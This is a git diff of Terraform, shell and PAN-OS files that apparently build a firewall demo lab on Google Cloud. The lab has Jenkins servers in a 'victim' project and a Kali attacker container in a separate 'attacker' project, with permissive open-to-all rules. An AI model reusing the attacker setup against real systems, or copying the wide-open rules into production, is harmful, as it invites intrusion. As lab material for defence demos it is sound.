Internal-AV + + + Internal-AS + + + Internal-VP + + + Internal-FB + + + Internal-WF + + + + + Alert-Only-AV + + + Alert-Only-AS + + + Alert-Only-VP + + + Alert-Only-URL + + + Alert-Only-FB + + + Alert-Only-WF + + + + + + + + + +
+
+
+
+
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt new file mode 100644 index 00000000..04c10233 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt @@ -0,0 +1,3 @@ +dns-primary=8.8.8.8 +dns-secondary=8.8.4.4 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt @@ -0,0 +1 @@ + diff --git a/gcp/Jenkins_proj-master/WebInDeploy/firewall.tf b/gcp/Jenkins_proj-master/WebInDeploy/firewall.tf new file mode 100644 index 00000000..7e1b2cdb --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/firewall.tf @@ -0,0 +1,57 @@ +resource "google_compute_instance" "firewall" { + project = "${google_project.victim_project.id}" + name = "firewall" + machine_type = "n1-standard-4" + zone = "${var.GCP_Zone}" + min_cpu_platform = "Intel Skylake" + can_ip_forward = true + allow_stopping_for_update = true + timeouts = { + create = "15m" + delete = "60m" + } + depends_on = ["google_storage_bucket_object.init_cfg", + "google_storage_bucket_object.bootstrap", + "google_storage_bucket_object.content", + "google_storage_bucket_object.software", + "google_storage_bucket_object.license", + "google_project_service.victim_project" + ] + // Adding METADATA Key Value pairs to VM-Series GCE instance + metadata { + vmseries-bootstrap-gce-storagebucket = "${google_storage_bucket.bootstrap_bucket.name}" + serial-port-enable = true + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + network_interface { + subnetwork = "${google_compute_subnetwork.untrust_subnet.self_link}" + network_ip = "${var.FW_Untrust_IP}" + access_config = {} + } + + network_interface { + subnetwork = "${google_compute_subnetwork.management_subnet.self_link}" + network_ip = "${var.FW_Mgmt_IP}" + access_config = {} + } + + network_interface { + subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}" + network_ip = "${var.FW_Trust_IP}" + } + + boot_disk { + initialize_params { + image = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-814" + } + } +} diff --git a/gcp/Jenkins_proj-master/WebInDeploy/gcp_firewall.tf b/gcp/Jenkins_proj-master/WebInDeploy/gcp_firewall.tf new file mode 100644 index 00000000..382aaade --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/gcp_firewall.tf @@ -0,0 +1,34 @@ +resource "google_compute_firewall" "management" { + name = "management-firewall" + project = "${google_project.victim_project.id}" + network = "${google_compute_network.management_network.name}" + allow { + protocol = "tcp" + ports = ["22", "443"] + } +} +resource "google_compute_firewall" "untrust" { + name = "untrust-firewall" + project = "${google_project.victim_project.id}" + network = "${google_compute_network.untrust_network.name}" + allow { + protocol = "tcp" + } +} +resource "google_compute_firewall" "trust" { + name = "trust-firewall" + project = "${google_project.victim_project.id}" + network = "${google_compute_network.trust_network.name}" + allow { + protocol = "tcp" + } +} +resource "google_compute_firewall" "attacker" { + name = "attacker-firewall" + project = "${google_project.attacker_project.id}" + network = "${google_compute_network.attacker_network.name}" + allow { + protocol = "tcp" + ports = ["22", "443", "5000"] + } +} diff --git a/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf b/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf new file mode 100644 index 00000000..793bc6c5 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf @@ -0,0 +1,16 @@ +variable "Billing_Account" {} +variable "Victim_Project_Name" {} +variable "Attacker_Project_Name" {} +variable "GCP_Region" {} +variable "GCP_Zone" {} +variable "Management_Subnet_CIDR" {} +variable "Untrust_Subnet_CIDR" {} +variable "Trust_Subnet_CIDR" {} +variable "Attacker_Subnet_CIDR" {} +variable "FW_Mgmt_IP" {} +variable "FW_Untrust_IP" {} +variable "FW_Trust_IP" {} +variable "WebLB_IP" {} +variable "Webserver_IP1" {} +variable "Webserver_IP2" {} +variable "Attacker_IP" {} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh b/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh new file mode 100644 index 00000000..032feb65 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh @@ -0,0 +1,14 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +echo "version: '3'" > docker-compose.yml +echo "services:" >> docker-compose.yml +echo " attacker:" >> docker-compose.yml +echo " image: pglynn/kali:latest" >> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"443:443\"" >> docker-compose.yml +echo " - \"5000:5000\"" >> docker-compose.yml +docker-compose up -d \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh b/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh new file mode 100644 index 00000000..55324851 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh @@ -0,0 +1,17 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +echo "version: '3'" > docker-compose.yml +echo "services:" >> docker-compose.yml +echo " jenkins:" >> docker-compose.yml +echo " image: pglynn/jenkins:version1.0" >> docker-compose.yml +echo " environment:" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"50000:50000\"" >> docker-compose.yml +echo " - \"8080:8080\"" >> docker-compose.yml +docker-compose up -d \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/lb-firewall.tf b/gcp/Jenkins_proj-master/WebInDeploy/lb-firewall.tf new file mode 100644 index 00000000..2897a657 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/lb-firewall.tf @@ -0,0 +1,147 @@ +resource "google_compute_instance_group" "firewalls" { + name = "firewalls-instance-group" + description = "An instance group for the single FW instance" + project = "${google_project.victim_project.id}" + zone = "${var.GCP_Zone}" + + instances = [ + "${google_compute_instance.firewall.self_link}", + ] + named_port { + name = "http-8080" + port = "8080" + } +} +resource "google_compute_target_pool" "firewalls" { + name = "armor-pool-firewalls" + project = "${google_project.victim_project.id}" + + instances = [ + "${google_compute_instance.firewall.self_link}", + ] + + health_checks = [ + "${google_compute_http_health_check.health.name}", + ] +} +resource "google_compute_backend_service" "firewalls" { + name = "armor-backend-firewalls" + description = "With FW" + project = "${google_project.victim_project.id}" + port_name = "http-8080" + protocol = "HTTP" + timeout_sec = 10 + enable_cdn = false + + backend { + group = "${google_compute_instance_group.firewalls.self_link}" + } + + security_policy = "${google_compute_security_policy.security-policy-firewalls.self_link}" + + health_checks = ["${google_compute_http_health_check.health.self_link}"] +} +resource "google_compute_security_policy" "security-policy-firewalls" { + name = "armor-security-policy-firewalls" + description = "example security policy" + project = "${google_project.victim_project.id}" + + # Reject all traffic that hasn't been whitelisted. + rule { + action = "deny(403)" + priority = "2147483647" + + match { + versioned_expr = "SRC_IPS_V1" + + config { + src_ip_ranges = ["*"] + } + } + + description = "Default rule, higher priority overrides it" + } + # Whitelist traffic from certain ip address + rule { + action = "allow" + priority = "1000" + + match { + versioned_expr = "SRC_IPS_V1" + + config { + src_ip_ranges = ["0.0.0.0/0"] + } + } + } +} +resource "google_compute_global_forwarding_rule" "firewalls" { + name = "armor-rule-firewalls" + project = "${google_project.victim_project.id}" + target = "${google_compute_target_http_proxy.firewalls.self_link}" + port_range = "80" +} +resource "google_compute_target_http_proxy" "firewalls" { + name = "armor-proxy-firewalls" + project = "${google_project.victim_project.id}" + url_map = "${google_compute_url_map.firewalls.self_link}" +} +resource "google_compute_url_map" "firewalls" { + name = "armor-url-map-firewalls" + project = "${google_project.victim_project.id}" + default_service = "${google_compute_backend_service.firewalls.self_link}" + + host_rule { + hosts = ["with-firewalls.com"] + path_matcher = "allpaths" + } + path_matcher { + name = "allpaths" + default_service = "${google_compute_backend_service.firewalls.self_link}" + + path_rule { + paths = ["/*"] + service = "${google_compute_backend_service.firewalls.self_link}" + } + } +} +resource "google_compute_health_check" "tcp-8080" { + name = "tcp-8080" + project = "${google_project.victim_project.id}" + check_interval_sec = 1 + timeout_sec = 1 + + tcp_health_check { + port = "8080" + } +} +resource "google_compute_instance_group" "ilb-webservers" { + name = "ilb-webserver-instance-group" + description = "An instance group for the webserver" + project = "${google_project.victim_project.id}" + zone = "${var.GCP_Zone}" + + instances = [ + "${google_compute_instance.jenkins2.self_link}", + ] +} +resource "google_compute_region_backend_service" "ilb-webserver" { + name = "ilb-webserver" + project = "${google_project.victim_project.id}" + region = "${var.GCP_Region}" + health_checks = ["${google_compute_health_check.tcp-8080.self_link}"] + + backend { + group = "${google_compute_instance_group.ilb-webservers.self_link}" + } +} +resource "google_compute_forwarding_rule" "ilb-webserver-forwarding-rule" { + name = "ilb-webserver-forwarding-rule" + project = "${google_project.victim_project.id}" + load_balancing_scheme = "INTERNAL" + ip_address = "${var.WebLB_IP}" + ports = ["8080"] + network = "${google_compute_network.trust_network.self_link}" + subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}" + backend_service = "${google_compute_region_backend_service.ilb-webserver.self_link}" +} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/lb-webserver.tf b/gcp/Jenkins_proj-master/WebInDeploy/lb-webserver.tf new file mode 100644 index 00000000..6f4d872a --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/lb-webserver.tf @@ -0,0 +1,115 @@ +resource "google_compute_instance_group" "webservers" { + name = "webserver-instance-group" + description = "An instance group for the webserver" + project = "${google_project.victim_project.id}" + zone = "${var.GCP_Zone}" + + instances = [ + "${google_compute_instance.jenkins1.self_link}", + ] + named_port { + name = "http-8080" + port = "8080" + } +} +resource "google_compute_target_pool" "webservers" { + name = "armor-pool-webservers" + project = "${google_project.victim_project.id}" + + instances = [ + "${google_compute_instance.jenkins1.self_link}", + ] + + health_checks = [ + "${google_compute_http_health_check.health.name}", + ] +} +resource "google_compute_http_health_check" "health" { + name = "armor-healthcheck" + project = "${google_project.victim_project.id}" + port = 8080 + request_path = "/" + check_interval_sec = 1 + timeout_sec = 1 +} +resource "google_compute_backend_service" "webservers" { + name = "armor-backend-webservers" + description = "Our company website" + project = "${google_project.victim_project.id}" + port_name = "http-8080" + protocol = "HTTP" + timeout_sec = 10 + enable_cdn = false + + backend { + group = "${google_compute_instance_group.webservers.self_link}" + } + + security_policy = "${google_compute_security_policy.security-policy-webservers.self_link}" + + health_checks = ["${google_compute_http_health_check.health.self_link}"] +} +resource "google_compute_security_policy" "security-policy-webservers" { + name = "armor-security-policy-webservers" + description = "example security policy" + project = "${google_project.victim_project.id}" + + # Reject all traffic that hasn't been whitelisted. + rule { + action = "deny(403)" + priority = "2147483647" + + match { + versioned_expr = "SRC_IPS_V1" + + config { + src_ip_ranges = ["*"] + } + } + + description = "Default rule, higher priority overrides it" + } + # Whitelist traffic from certain ip address + rule { + action = "allow" + priority = "1000" + + match { + versioned_expr = "SRC_IPS_V1" + + config { + src_ip_ranges = ["0.0.0.0/0"] + } + } + } +} +resource "google_compute_global_forwarding_rule" "webservers" { + name = "armor-rule-webservers" + project = "${google_project.victim_project.id}" + target = "${google_compute_target_http_proxy.webservers.self_link}" + port_range = "80" +} +resource "google_compute_target_http_proxy" "webservers" { + name = "armor-proxy-webservers" + project = "${google_project.victim_project.id}" + url_map = "${google_compute_url_map.webservers.self_link}" +} +resource "google_compute_url_map" "webservers" { + name = "armor-url-map-webservers" + project = "${google_project.victim_project.id}" + default_service = "${google_compute_backend_service.webservers.self_link}" + + host_rule { + hosts = ["sans-firewalls.com"] + path_matcher = "allpaths" + } + path_matcher { + name = "allpaths" + default_service = "${google_compute_backend_service.webservers.self_link}" + + path_rule { + paths = ["/*"] + service = "${google_compute_backend_service.webservers.self_link}" + } + } +} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/main.tf b/gcp/Jenkins_proj-master/WebInDeploy/main.tf new file mode 100644 index 00000000..2039e938 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/main.tf @@ -0,0 +1,5 @@ +provider "google" { + region = "${var.GCP_Region}" +} + +provider "random" {} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/output.tf b/gcp/Jenkins_proj-master/WebInDeploy/output.tf new file mode 100644 index 00000000..b96cf54d --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/output.tf @@ -0,0 +1,15 @@ +output "FW_Mgmt_IP" { + value = "${google_compute_instance.firewall.network_interface.1.access_config.0.nat_ip}" +} + +output "ALB-DNS" { + value = "${google_compute_global_forwarding_rule.firewalls.ip_address}" +} + +output "NATIVE-DNS" { + value = "${google_compute_global_forwarding_rule.webservers.ip_address}" +} + +output "ATTACKER_IP" { + value = "${google_compute_instance.attacker.network_interface.0.access_config.0.nat_ip}" +} diff --git a/gcp/Jenkins_proj-master/WebInDeploy/project.tf b/gcp/Jenkins_proj-master/WebInDeploy/project.tf new file mode 100644 index 00000000..10a1036d --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/project.tf @@ -0,0 +1,25 @@ +resource "random_id" "project_number" { + byte_length = 2 +} +resource "google_project" "victim_project" { + name = "${var.Victim_Project_Name}-${random_id.project_number.hex}" + project_id = "${var.Victim_Project_Name}-${random_id.project_number.hex}" + billing_account = "${var.Billing_Account}" + auto_create_network = false +} +resource "google_project_service" "victim_project" { + project = "${google_project.victim_project.project_id}", + service = "storage-api.googleapis.com" + disable_dependent_services = true +} +resource "google_project" "attacker_project" { + name = "${var.Attacker_Project_Name}-${random_id.project_number.hex}" + project_id = "${var.Attacker_Project_Name}-${random_id.project_number.hex}" + billing_account = "${var.Billing_Account}" + auto_create_network = false +} +resource "google_project_service" "attacker_project" { + project = "${google_project.attacker_project.project_id}", + service = "storage-api.googleapis.com" + disable_dependent_services = true +} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh new file mode 100644 index 00000000..032feb65 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh @@ -0,0 +1,14 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +echo "version: '3'" > docker-compose.yml +echo "services:" >> docker-compose.yml +echo " attacker:" >> docker-compose.yml +echo " image: pglynn/kali:latest" >> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"443:443\"" >> docker-compose.yml +echo " - \"5000:5000\"" >> docker-compose.yml +docker-compose up -d \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh new file mode 100644 index 00000000..bb37c3e5 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh @@ -0,0 +1,17 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +echo "version: '3'" > docker-compose.yml +echo "services:" >> docker-compose.yml +echo " jenkins:" >> docker-compose.yml +echo " image: pglynn/jenkins:latest" >> docker-compose.yml +echo " environment:" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"50000:50000\"" >> docker-compose.yml +echo " - \"8080:8080\"" >> docker-compose.yml +docker-compose up -d diff --git a/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars b/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars new file mode 100644 index 00000000..20f487e7 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars @@ -0,0 +1,31 @@ +Billing_Account = "" + +Attacker_Project_Name = "attacker" + +Victim_Project_Name = "jenkins" + +GCP_Region = "us-central1" + +GCP_Zone = "us-central1-a" + +Management_Subnet_CIDR = "10.0.0.0/24" + +Untrust_Subnet_CIDR = "10.0.1.0/24" + +Trust_Subnet_CIDR = "10.0.2.0/24" + +Attacker_Subnet_CIDR = "10.1.1.0/24" + +FW_Mgmt_IP = "10.0.0.10" + +FW_Untrust_IP = "10.0.1.10" + +FW_Trust_IP = "10.0.2.10" + +WebLB_IP = "10.0.2.30" + +Webserver_IP1 = "10.0.2.50" + +Webserver_IP2 = "10.0.2.60" + +Attacker_IP = "10.1.1.50" \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/vpc-subnets.tf b/gcp/Jenkins_proj-master/WebInDeploy/vpc-subnets.tf new file mode 100644 index 00000000..811e40dd --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/vpc-subnets.tf @@ -0,0 +1,48 @@ +resource "google_compute_network" "management_network" { + project = "${google_project.victim_project.id}" + name = "management" + auto_create_subnetworks = false +} +resource "google_compute_network" "untrust_network" { + project = "${google_project.victim_project.id}" + name = "untrust" + auto_create_subnetworks = false +} +resource "google_compute_network" "trust_network" { + project = "${google_project.victim_project.id}" + name = "trust" + auto_create_subnetworks = false +} +resource "google_compute_network" "attacker_network" { + project = "${google_project.attacker_project.id}" + name = "attacker" + auto_create_subnetworks = false +} +resource "google_compute_subnetwork" "management_subnet" { + name = "management" + project = "${google_project.victim_project.id}" + region = "${var.GCP_Region}" + ip_cidr_range = "${var.Management_Subnet_CIDR}" + network = "${google_compute_network.management_network.self_link}" +} +resource "google_compute_subnetwork" "untrust_subnet" { + name = "untrust" + project = "${google_project.victim_project.id}" + region = "${var.GCP_Region}" + ip_cidr_range = "${var.Untrust_Subnet_CIDR}" + network = "${google_compute_network.untrust_network.self_link}" +} +resource "google_compute_subnetwork" "trust_subnet" { + name = "trust" + project = "${google_project.victim_project.id}" + region = "${var.GCP_Region}" + ip_cidr_range = "${var.Trust_Subnet_CIDR}" + network = "${google_compute_network.trust_network.self_link}" +} +resource "google_compute_subnetwork" "attacker_subnet" { + name = "attacker" + project = "${google_project.attacker_project.id}" + region = "${var.GCP_Region}" + ip_cidr_range = "${var.Attacker_Subnet_CIDR}" + network = "${google_compute_network.attacker_network.self_link}" +} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/webservers.tf b/gcp/Jenkins_proj-master/WebInDeploy/webservers.tf new file mode 100644 index 00000000..bb9d328e --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/webservers.tf @@ -0,0 +1,80 @@ +resource "google_compute_instance" "jenkins1" { + name = "jenkins1" + project = "${google_project.victim_project.id}" + zone = "${var.GCP_Zone}" + machine_type = "n1-standard-1" + allow_stopping_for_update = true + timeouts = { + create = "15m" + delete = "60m" + } + depends_on = [ + "google_storage_bucket_object.config_file_webserver", + "google_project_service.victim_project" + ] + metadata { + startup-script-url = "gs://${google_storage_bucket.bootstrap_bucket.name}/initialize_webserver.sh" + serial-port-enable = true + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + "https://www.googleapis.com/auth/compute.readonly", + ] + } + + boot_disk { + initialize_params { + image = "ubuntu-os-cloud/ubuntu-1604-lts" + } + } + + network_interface { + subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}" + network_ip = "${var.Webserver_IP1}" + access_config = {} + } + depends_on = ["google_storage_bucket_object.config_file_webserver"] +} +resource "google_compute_instance" "jenkins2" { + name = "jenkins2" + project = "${google_project.victim_project.id}" + zone = "${var.GCP_Zone}" + machine_type = "n1-standard-1" + allow_stopping_for_update = true + depends_on = [ + "google_storage_bucket_object.config_file_webserver", + "google_project_service.victim_project" + ] + metadata { + startup-script-url = "gs://${google_storage_bucket.bootstrap_bucket.name}/initialize_webserver.sh" + serial-port-enable = true + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + "https://www.googleapis.com/auth/compute.readonly", + ] + } + + boot_disk { + initialize_params { + image = "ubuntu-os-cloud/ubuntu-1604-lts" + } + } + + network_interface { + subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}" + network_ip = "${var.Webserver_IP2}" + access_config = {} + } + depends_on = ["google_storage_bucket_object.config_file_webserver"] +} diff --git a/gcp/Jenkins_proj-master/WebInFWConf/firewallconfig.tf b/gcp/Jenkins_proj-master/WebInFWConf/firewallconfig.tf new file mode 100644 index 00000000..d9bdc901 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInFWConf/firewallconfig.tf @@ -0,0 +1,233 @@ +provider "panos" { + hostname = "${var.FW_Mgmt_IP}" + username = "${var.Admin_Username}" + password = "${var.Admin_Password}" +} + +resource "panos_management_profile" "imp_allow_ping" { + name = "Allow ping" + ping = true +} + +resource "panos_ethernet_interface" "eth1_1" { + name = "ethernet1/1" + vsys = "vsys1" + mode = "layer3" + comment = "External interface" + enable_dhcp = true + create_dhcp_default_route = true + management_profile = "${panos_management_profile.imp_allow_ping.name}" +} + +resource "panos_ethernet_interface" "eth1_2" { + name = "ethernet1/2" + vsys = "vsys1" + mode = "layer3" + comment = "Web interface" + enable_dhcp = true +} + +resource "panos_zone" "zone_untrust" { + name = "UNTRUST" + mode = "layer3" + interfaces = ["${panos_ethernet_interface.eth1_1.name}"] +} + +resource "panos_zone" "zone_trust" { + name = "TRUST" + mode = "layer3" + interfaces = ["${panos_ethernet_interface.eth1_2.name}"] +} + +resource "panos_service_object" "so_22" { + name = "service-tcp-22" + protocol = "tcp" + destination_port = "22" +} + +resource "panos_service_object" "so_221" { + name = "service-tcp-221" + protocol = "tcp" + destination_port = "221" +} + +resource "panos_service_object" "so_222" { + name = "service-tcp-222" + protocol = "tcp" + destination_port = "222" +} + +resource "panos_address_object" "intLB" { + name = "GCP-Int-LB" + value = "${var.WebLB_IP}" + description = "GCP Int LB Address" +} + +resource "panos_security_policies" "security_policies" { + rule { + name = "SSH inbound" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}"] + destination_addresses = ["any"] + applications = ["ssh", "ping"] + services = ["application-default"] + categories = ["any"] + action = "allow" + } + + rule { + name = "SSH 221-222 inbound" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}"] + destination_addresses = ["any"] + applications = ["ssh", "ping"] + services = ["${panos_service_object.so_221.name}", "${panos_service_object.so_222.name}"] + categories = ["any"] + action = "allow" + } + + rule { + name = "Allow all ping" + source_zones = ["any"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["any"] + destination_addresses = ["any"] + applications = ["ping"] + services = ["application-default"] + categories = ["any"] + action = "allow" + } + + rule { + name = "Permit Health Checks" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}"] + destination_addresses = ["any"] + applications = ["google-health-check"] + services = ["service-http"] + categories = ["any"] + action = "allow" + } + + rule { + name = "Web browsing" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}", "${panos_zone.zone_untrust.name}"] + destination_addresses = ["any"] + applications = ["web-browsing", "jenkins"] + services = ["service-http"] + categories = ["any"] + group = "Inbound" + action = "allow" + } + + rule { + name = "Allow all outbound" + source_zones = ["${panos_zone.zone_trust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_untrust.name}"] + destination_addresses = ["any"] + applications = ["any"] + services = ["application-default"] + categories = ["any"] + group = "Outbound" + action = "allow" + } +} + +resource "panos_nat_rule_group" "nat" { + rule { + name = "Web1 SSH" + original_packet { + source_zones = ["${panos_zone.zone_untrust.name}"] + destination_zone = "${panos_zone.zone_untrust.name}" + source_addresses = ["any"] + destination_addresses = ["${var.FW_Untrust_IP}"] + service = "${panos_service_object.so_221.name}" + } + translated_packet { + source { + dynamic_ip_and_port { + interface_address { + interface = "${panos_ethernet_interface.eth1_2.name}" + } + } + } + destination { + static { + address = "${var.Webserver_IP1}" + port = 22 + } + } + } + } + rule { + name = "Web2 SSH" + original_packet { + source_zones = ["${panos_zone.zone_untrust.name}"] + destination_zone = "${panos_zone.zone_untrust.name}" + source_addresses = ["any"] + destination_addresses = ["${var.FW_Untrust_IP}"] + service = "${panos_service_object.so_222.name}" + } + translated_packet { + source { + dynamic_ip_and_port { + interface_address { + interface = "${panos_ethernet_interface.eth1_2.name}" + } + } + } + destination { + static { + address = "${var.Webserver_IP2}" + port = 22 + } + } + } + } + rule { + name = "Webserver NAT" + original_packet { + source_zones = ["${panos_zone.zone_untrust.name}"] + destination_zone = "${panos_zone.zone_untrust.name}" + source_addresses = ["any"] + destination_addresses = ["${var.FW_Untrust_IP}"] + service = "service-http" + } + translated_packet { + source { + dynamic_ip_and_port { + interface_address { + interface = "${panos_ethernet_interface.eth1_2.name}" + } + } + } + destination { + static { + address = "GCP-Int-LB" + } + } + } + } +} +resource "panos_virtual_router" "vr1" { + name = "default" + interfaces = ["${panos_ethernet_interface.eth1_1.name}", "${panos_ethernet_interface.eth1_2.name}"] +} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf b/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf new file mode 100644 index 00000000..879b9d9b --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf @@ -0,0 +1,7 @@ +variable "FW_Mgmt_IP" {} +variable "FW_Untrust_IP" {} +variable "Webserver_IP1" {} +variable "Webserver_IP2" {} +variable "WebLB_IP" {} +variable "Admin_Username" {} +variable "Admin_Password" {} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars b/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars new file mode 100644 index 00000000..ae5cfd65 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars @@ -0,0 +1,11 @@ +Admin_Username = "" + +Admin_Password = "" + +FW_Untrust_IP = "10.0.1.10" + +WebLB_IP = "10.0.2.30" + +Webserver_IP1 = "10.0.2.50" + +Webserver_IP2 = "10.0.2.60" \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/deploy.py b/gcp/Jenkins_proj-master/deploy.py new file mode 100644 index 00000000..35b66a1e --- /dev/null +++ b/gcp/Jenkins_proj-master/deploy.py @@ -0,0 +1,653 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage + +python deploy.py -u -p -r -a + +""" + +import argparse +import json +import logging +import os +import subprocess +import sys +import time +import uuid +import xml.etree.ElementTree as ET +import xmltodict +import requests +import urllib3 +from google.cloud import storage + + +from pandevice import firewall +from python_terraform import Terraform +from collections import OrderedDict + + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +_archive_dir = './WebInDeploy/bootstrap' +_content_update_dir = './WebInDeploy/content_updates/' + +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) + + +# global var to keep status output +status_output = dict() + + +def send_request(call): + + """ + Handles sending requests to API + :param call: url + :return: 